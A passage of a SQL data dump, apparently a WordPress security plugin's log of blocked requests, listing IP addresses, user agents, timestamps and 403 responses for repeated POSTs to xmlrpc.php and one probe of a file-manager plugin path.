Safari\\/537.36\"}','WO4PzultN8mH1kxVU5f2ZYq0',0,1681419395.6670,573,'','POST',403,0,515,0,1,'',0),('188.244.30.230',3170115302,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','dSKG6BtmCXTq9UaVbRoilLOx',0,1681419397.5547,699,'','POST',403,0,515,0,1,'',0),('194.187.251.163',3267099555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uemWRC2rHJFNDiIgt4aLdAYO',0,1681420779.0930,4087,'','POST',403,0,515,0,1,'',0),('199.249.230.7',3355043335,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','j5VNv46hmBYMI8KUouWd39b0',0,1681421225.0787,4461,'','POST',403,0,515,0,1,'',0),('45.162.229.147',765650323,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0MtoN2slKv7hOySQIHRE5u3q',0,1681421519.0324,3745,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://mail.cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','xzrBq4lcvySNTKo2LfsaG1U9',0,1681421881.2379,302,'','GET',403,0,700,0,1,'',0),('163.47.21.95',2737771871,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','NWKLEPrOXIsFcSG3exDmtf1w',0,1681422635.4441,773,'','POST',403,0,515,0,1,'',0),('199.16.130.127',3339747967,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','ZMnpFeXBof9VdSTjPUQRh4vA',0,1681422638.3646,1374,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','0TuaeFUzGErXgHYdAnCRD5hv',0,1681422638.7901,1675,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','gTGkxa3cfYKolMpeSZuOFXh8',0,1681422639.9590,936,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','fZCrvadVtXTUlHm0zp9jyOMu',0,1681422644.9684,1305,'','POST',403,0,515,0,1,'',0),('95.0.0.250',1593835770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','WI6VHQmwKcOSdLqBkNYrx38y',0,1681422645.1444,1321,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','ri5MFQH9Tub3CLJsKg67aj8E',0,1681422663.3849,1277,'','POST',403,0,515,0,1,'',0),('200.58.112.27',3359272987,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','5xyB2EqJ4tvW6sboHU3dr7mn',0,1681422663.7418,1214,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','ictRdA3koNUYLzZ84bf2vMCQ',0,1681422674.3806,567,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','y4JmkzcZjMUIBiGt7E5N8XPs',0,1681422677.2520,579,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','f8WVpLQ064BIznigYj9weFsG',0,1681422689.6066,596,'','POST',403,0,515,0,1,'',0),('103.74.119.218',1732933594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Y4IQPdcgTrk1HbN7lei3hCnG',0,1681426768.1308,1008,'','POST',403,0,515,0,1,'',0),('78.46.136.94',1311672414,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','Pgw15RBbDOZpaYrNtosuHncf',0,1681426768.5853,908,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Y9vAgfMXOldaJ3bUurCWoEyw',0,1681426772.4154,591,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','vLgzGTZbl9QheB10Jqj5arc2',0,1681426785.6280,628,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','eClMvyDmn7VR26SrJubs8tPL',0,1681426792.0459,1355,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','WD5jFCMO4AVPEgo9wKZbRLXa',0,1681426796.4574,569,'','POST',403,0,515,0,1,'',0),('46.242.243.105',787673961,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','NtWZIu4A7TBSKhyDjCeH1P3w',0,1681426814.1117,560,'','POST',403,0,515,0,1,'',0),('38.240.226.19',653320723,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5Bth1HsjzGmu4W0QRZTJ2LIP',0,1681429195.2977,3964,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','c78qwZBHSlaM6PJxyszWfCgF',0,1681431320.8988,1756,'','POST',403,0,515,0,1,'',0),('41.222.211.123',702468987,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','bV93HzE0rDUWAjBFQLlNXqdm',0,1681431318.8877,3975,'','POST',403,0,515,0,1,'',0),('171.244.61.154',2884910490,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','782BWlUFh63JHjwGfSkK9ToO',0,1681431322.6143,1203,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','ZayQmXuG8n1CgUt4P5jdoz3s',0,1681431325.2194,684,'','POST',403,0,515,0,1,'',0),('185.107.113.247',3110826487,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','QDxEUtKaYNol8wIXu509ih76',0,1681431326.5653,1219,'','POST',403,0,515,0,1,'',0),('68.178.247.133',1152579461,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','pbQHYt2C8ulyEnvcRB574eog',0,1681431326.8765,1198,'','POST',403,0,515,0,1,'',0),('205.144.171.194',3448810434,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','HUyVThKPAMf7CtiGs84SnDLJ',0,1681431330.2744,570,'','POST',403,0,515,0,1,'',0),('184.168.98.120',3098043000,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','TzcZBhlIuSX19PgAJHLYRxe7',0,1681431342.4324,544,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','7G0eQxUwRlB6X9c1irH3ptus',0,1681431344.6659,547,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','PCExmXeMl5JQHWLZ1DwOdgrk',0,1681431351.8072,606,'','POST',403,0,515,0,1,'',0),('95.0.0.250',1593835770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','NBiIzaKAcShuX7UZ0p62WCTH',0,1681431353.6991,562,'','POST',403,0,515,0,1,'',0),('3.34.224.66',52617282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','RW5vSOnwBuopAPsygQaG3Hzh',0,1681431354.7284,559,'','POST',403,0,515,0,1,'',0),('185.189.112.27',3116199963,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','drDAaV7mk9BPHYwSFz3MxQNL',0,1681431816.1966,3948,'','POST',403,0,515,0,1,'',0),('185.93.182.171',3109926571,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','poUhZtDeqrI6nluEs0G9KCSM',0,1681432399.4648,3834,'','POST',403,0,515,0,1,'',0),('103.221.221.51',1742593331,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','ykJ1C5d6olZsipNgOvWBSc2R',0,1681433134.2130,706,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','socQ9kXRnfeDUljG70JgAOSZ',0,1681433136.1667,628,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','oUvpr4ecIVTNl0hq8L9itZAH',0,1681433137.8731,563,'','POST',403,0,515,0,1,'',0),('146.59.38.213',2453350101,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','vwtRCSlu4JOIYn6QUVbXFr8p',0,1681433142.1864,601,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','HBV8yGs4vka6peiquNgOA21f',0,1681433143.1329,552,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','jDIYJO0SUQfwVXCa5hTFBLit',0,1681433145.1559,549,'','POST',403,0,515,0,1,'',0),('95.0.0.250',1593835770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','hO2uLmMIGKNdcPgH09nkvU3t',0,1681433152.3054,592,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','fjK0qmkl1RX85icuNzPbyprn',0,1681433154.5012,584,'','POST',403,0,515,0,1,'',0),('163.47.21.95',2737771871,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','DwIzpA1xjYv64qJiRMXKe5Oh',0,1681433159.8626,610,'','POST',403,0,515,0,1,'',0),('150.60.157.163',2520554915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','r3K5aOCovF9Ll6Xyd0PqABUn',0,1681433166.4728,580,'','POST',403,0,515,0,1,'',0),('185.182.57.22',3115727126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','za5my4VqO0rQRNpWjSKYtPUM',0,1681433167.2768,577,'','POST',403,0,515,0,1,'',0),('103.141.97.148',1737318804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','kuYE8Ud7y5Qw1brZRcKH6hNF',0,1681433170.5115,691,'','POST',403,0,515,0,1,'',0),('154.0.166.134',2583733894,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','tfOXPRMrniBbwd0T4HSc96sz',0,1681438986.3169,3039,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','mb9fJNiBaFEADxGpyXY7HORs',0,1681438986.1055,4234,'','POST',403,0,515,0,1,'',0),('119.18.52.231',1997681895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','1X4hpFeL5vI6mqHY8PVstUEd',0,1681438986.6984,3641,'','POST',403,0,515,0,1,'',0),('194.163.188.46',3265510446,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','gu2xdXiSa1FTH8IyUfpwADtM',0,1681438994.6591,598,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','UYZnzqwvPh9VrkxJDSt6IBjf',0,1681439001.2649,2783,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','JPaK5o2TZ0nUGeOEcLDAShzp',0,1681439002.3971,2149,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','qMch1QlGCvbfWLzVaXRjPieT',0,1681439013.0294,600,'','POST',403,0,515,0,1,'',0),('157.90.161.243',2639962611,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','dmOFSPgxaAQq92uwW85oIjTJ',0,1681439021.7535,1592,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','7BSktnvA38Kj9Hl4RLsqeX6I',0,1681439028.6190,589,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','4VDF2qxCh0OPMGfe5kUgoKwB',0,1681440685.6893,749,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ZFu50JCgrhiQajWbfKonYR1p',0,1681440691.0794,692,'','POST',403,0,515,0,1,'',0),('43.240.66.51',737165875,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','AEuyvUKL2zBskgGIcOXTfr4l',0,1681440694.0529,576,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','QtzkVTnB1sOjWe8bfwRN73K0',0,1681440701.3055,568,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','gadxRblXc15mMPLt82uQZkhC',0,1681440707.4582,955,'','POST',403,0,515,0,1,'',0),('104.168.133.147',1755874707,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','Grm7IxYKVjX9o5CZDewNvR4U',0,1681440710.6882,571,'','POST',403,0,515,0,1,'',0),('200.58.111.20',3359272724,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','KcqQt0Oy6Uu3oSLEdMPGFYDr',0,1681440714.6242,581,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','gbEyYLu2PZD1lhAzops4i75f',0,1681440715.8719,561,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','dSNj0ClK2tQWrDIUeO9Yw5pu',0,1681440719.6678,564,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','eI7E5Dh8zlGpoVgOTrBFcCsY',0,1681440721.0273,1114,'','POST',403,0,515,0,1,'',0),('201.148.104.84',3381946452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','FRZfriDKCmVG2TzEcoleOUjg',0,1681440721.4920,1043,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','h3oLRfgDrl5Kv6pJPTck4Zbm',0,1681441224.8691,724,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','y7Y5FXNqGuSotiIUbzkV9pQ1',0,1681444528.5512,3648,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','qB6VIanZgE4obhAetFKlN9xJ',0,1681444532.4329,605,'','POST',403,0,515,0,1,'',0),('184.168.98.120',3098043000,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','KnTsa1my72DfYEzjWMA4qBIx',0,1681444538.7308,623,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','3upHhia1bEmf09ZgFC8kjKqc',0,1681444544.6163,684,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','ohmwiRD6qKsWEj1a45YAOxLF',0,1681444547.6443,596,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','eVo612fIuKQkUq3svBdLZjz9',0,1681444556.1808,557,'','POST',403,0,515,0,1,'',0),('41.111.172.42',695184426,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','1JlhIjn6p8Q7XNrBRubEwPOV',0,1681444562.6466,563,'','POST',403,0,515,0,1,'',0),('150.60.157.163',2520554915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','VNyilhpHzvuUaegTxsPDMB6q',0,1681444565.1616,677,'','POST',403,0,515,0,1,'',0),('5.9.178.235',84521707,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','xg6U4OJboD95Eswnp7XIWrlR',0,1681448238.0762,4357,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','P5cFALHKi3yrBgkTWhIsbZlC',0,1681448239.3511,3993,'','POST',403,0,515,0,1,'',0),('37.218.252.12',635108364,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','w2vSLdBg4uRoyZVt3Y6KMOWx',0,1681448244.7520,628,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','hNZO3n52Ww8IxuK19A7YsDrF',0,1681448249.4769,582,'','POST',403,0,515,0,1,'',0),('192.241.166.226',3237062370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 